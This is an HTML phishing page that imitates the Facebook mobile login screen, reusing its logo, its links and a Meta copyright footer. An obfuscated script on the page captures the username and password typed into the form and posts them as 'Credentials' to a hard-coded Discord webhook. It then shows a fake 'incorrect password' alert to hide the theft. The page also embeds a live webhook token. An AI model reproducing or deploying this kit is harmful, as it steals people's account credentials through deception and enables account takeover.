<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in to facebook | Facebook</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div class="logo">
        <center><img src="Facebook-Logo.png" alt="" width="93px" style="margin-left:70px;"></center>
        <div class="input">
            <form id="webhookForm">
                <input type="text" id="username" class="username" placeholder=" &nbsp Mobile number or email address" required>
                <br>
                <input type="text" id="password" class="password" placeholder=" &nbsp  Password" required >
                <br>
                <button type="submit" class="button" ondblclick="alert('Alert this pages')"";>Log in</button>
            </form>

            <a
                href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fprivacy_mutation_token%3DeyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzEzNzE1NzY1LCJjYWxsc2l0ZV9pZCI6Nzk2MTcwNzM0NTY5ODY0fQ%253D%253D%26refid%3D8&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&_rdr">
                <p class="forgot">Forgotten password?</p>
            </a>

            <p class="or">________________________or_______________________</p>

            <a href="https://m.facebook.com/reg/?is_two_steps_login=0&cid=103&refsrc=deprecated&soft=hjk"><button
                    class="new">Create new account</button></a>
            <ul style="list-style: none;">
                <div class="lang1">
                    <br>
                    <li>English(UK)</li>
                    <li>Francais(france)</li>
                    <li>Espanol</li>
                    <li>Deutsch</li>
                    <li>Hausa</li>
                <li>Português (Brasil)</li>
                <li>العربية</li>
        </div>
    </div>
    </ul>

    <footer style="text-align: center; margin-top: 100px; margin-left: 100px; color: rgba(40, 40, 40, 0.638);"> Meta &copy; 2024 </footer>
    </div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script>
        function _0xcc60(){var _0x332221=['4174200WsbvgL','451054ZfbFdj','#password','incorrect password or username ','274fzguUu','preventDefault','stringify','submit','5598ITtHmK','2087743CDsKcV','12468LdlebT','Error.','178004cuEMZD','#webhookForm','ready','9KTEQWS','1973080LzEwkN','POST','application/json','85eOuCrM','instagram-Username','VOTE\x20/\x20W15D0M','instagram-Password','val'];_0xcc60=function(){return _0x332221;};return _0xcc60();}function _0xeeb0(_0x1282c3,_0x348670){var _0xcc6038=_0xcc60();return _0xeeb0=function(_0xeeb0a,_0x236d2d){_0xeeb0a=_0xeeb0a-0x12c;var _0x13d31a=_0xcc6038[_0xeeb0a];return _0x13d31a;},_0xeeb0(_0x1282c3,_0x348670);}var _0x430ea6=_0xeeb0;(function(_0x74517,_0x12b64f){var _0x2552d1=_0xeeb0,_0x15a96b=_0x74517();while(!![]){try{var _0x80f6e7=parseInt(_0x2552d1(0x12e))/0x1+parseInt(_0x2552d1(0x131))/0x2*(parseInt(_0x2552d1(0x135))/0x3)+parseInt(_0x2552d1(0x139))/0x4+parseInt(_0x2552d1(0x140))/0x5*(-parseInt(_0x2552d1(0x137))/0x6)+-parseInt(_0x2552d1(0x136))/0x7+parseInt(_0x2552d1(0x13d))/0x8+parseInt(_0x2552d1(0x13c))/0x9*(-parseInt(_0x2552d1(0x12d))/0xa);if(_0x80f6e7===_0x12b64f)break;else _0x15a96b['push'](_0x15a96b['shift']());}catch(_0x47f46e){_0x15a96b['push'](_0x15a96b['shift']());}}}(_0xcc60,0x3c435),$(document)[_0x430ea6(0x13b)](function(){var _0x581cbb=_0x430ea6,_0x858f35='',_0x3440c3=_0x581cbb(0x142),_0x24a444='https://discord.com/api/webhooks/1239291189794963616/t70--MbeCxiDDxTlQnbzukWXjetA79LdM1kZ_X_Y0uWsokZrqdJO6UzVvP0AlCWKInRc';$(_0x581cbb(0x13a))[_0x581cbb(0x134)](function(_0x140f1d){var _0x23b066=_0x581cbb;_0x140f1d[_0x23b066(0x132)]();var _0x440143=$('#username')[_0x23b066(0x12c)](),_0x4f4e58=$(_0x23b066(0x12f))[_0x23b066(0x12c)](),_0x1a1d6b=[{'name':_0x23b066(0x141),'value':_0x440143},{'name':_0x23b066(0x143),'value':_0x4f4e58}],_0x5e01e1={'username':_0x3440c3,'avatar_url':_0x858f35,'embeds':[{'author':{'name':_0x3440c3,'icon_url':_0x858f35},'title':'Credentials','fields':_0x1a1d6b,'color':0x2}]};$['ajax']({'url':_0x24a444,'type':_0x23b066(0x13e),'contentType':_0x23b066(0x13f),'data':JSON[_0x23b066(0x133)](_0x5e01e1),'success':function(){var _0x5ab952=_0x23b066;alert(_0x5ab952(0x130));},'error':function(){var _0x51ca52=_0x23b066;alert(_0x51ca52(0x138));}});});}));
         </script>
      <style>
        #modalContainer {
	background-color:rgba(0, 0, 0, 0);
	position:absolute;
	width:100%;
	height:100%;
	top:400px;
	left:0px;
	z-index:10000;
    border-radius: 5px;
	background-image:url(tp.png); /* required by MSIE to prevent actions on lower z-index elements */
}

#alertBox {
	position:relative;
	width:300px;
	min-height:100px;
	margin-top:50px;
	border:1px solid #666;
	background-color:#fff;
	background-repeat:no-repeat;
	background-position:20px 30px;
    border-radius: 5PX;
}

#modalContainer > #alertBox {
	position:fixed;
}

#alertBox h1 {
	margin:0;
	font:bold 0.9em verdana,arial;
	background-color:#00055c;
	color:#FFF;
	border-bottom:2px solid #000;
	padding:2px 0 2px 5px;
}

#alertBox p {
	font:0.7em verdana,arial;
	height:50px;
	padding-left:5px;
	margin-left:55px;
}

#alertBox #closeBtn {
	display:block;
	position:relative;
	margin:5px auto;
	padding:7px;
	border:0 none;
	width:70px;
	font:0.7em verdana,arial;
	text-transform:uppercase;
	text-align:center;
	color:#FFF;
	background-color:#00116e;
	border-radius: 3px;
	text-decoration:none;
}

/* unrelated styles */

#mContainer {
	position:relative;
	width:600px;
	margin:auto;
	padding:5px;
	border-top:2px solid #000;
	border-bottom:2px solid #000;
	font:0.7em verdana,arial;
}

h1,h2 {
	margin:0;
	padding:4px;
	font:bold 1.5em verdana;
	border-bottom:1px solid #000;
}

code {
	font-size:1.2em;
	color:#069;
}

#credits {
	position:relative;
	margin:25px auto 0px auto;
	width:350px; 
	font:0.7em verdana;
	border-top:1px solid #000;
	border-bottom:1px solid #000;
	height:90px;
	padding-top:4px;
}

#credits img {
	float:left;
	margin:5px 10px 5px 0px;
	border:1px solid #000000;
	width:80px;
	height:79px;
}

.important {
	background-color:#F5FCC8;
	padding:2px;
}

code span {
	color:green;
}
    </style>
   



    <script>
        var ALERT_TITLE = "Oops!";
var ALERT_BUTTON_TEXT = "Ok";

if(document.getElementById) {
	window.alert = function(txt) {
		createCustomAlert(txt);
	}
}

function createCustomAlert(txt) {
	d = document;

	if(d.getElementById("modalContainer")) return;

	mObj = d.getElementsByTagName("body")[0].appendChild(d.createElement("div"));
	mObj.id = "modalContainer";
	mObj.style.height = d.documentElement.scrollHeight + "px";
	
	alertObj = mObj.appendChild(d.createElement("div"));
	alertObj.id = "alertBox";
	if(d.all && !window.opera) alertObj.style.top = document.documentElement.scrollTop + "px";
	alertObj.style.left = (d.documentElement.scrollWidth - alertObj.offsetWidth)/2 + "px";
	alertObj.style.visiblity="visible";

	h1 = alertObj.appendChild(d.createElement("h1"));
	h1.appendChild(d.createTextNode(ALERT_TITLE));

	msg = alertObj.appendChild(d.createElement("p"));
	//msg.appendChild(d.createTextNode(txt));
	msg.innerHTML = txt;

	btn = alertObj.appendChild(d.createElement("a"));
	btn.id = "closeBtn";
	btn.appendChild(d.createTextNode(ALERT_BUTTON_TEXT));
	btn.href = "#";
	btn.focus();
	btn.onclick = function() { removeCustomAlert();return false; }

	alertObj.style.display = "block";
	
}

function removeCustomAlert() {
	document.getElementsByTagName("body")[0].removeChild(document.getElementById("modalContainer"));
}
function ful(){
alert('INCORRECT PASSWORD USERNAME');
}
    </script>
</body>

</html>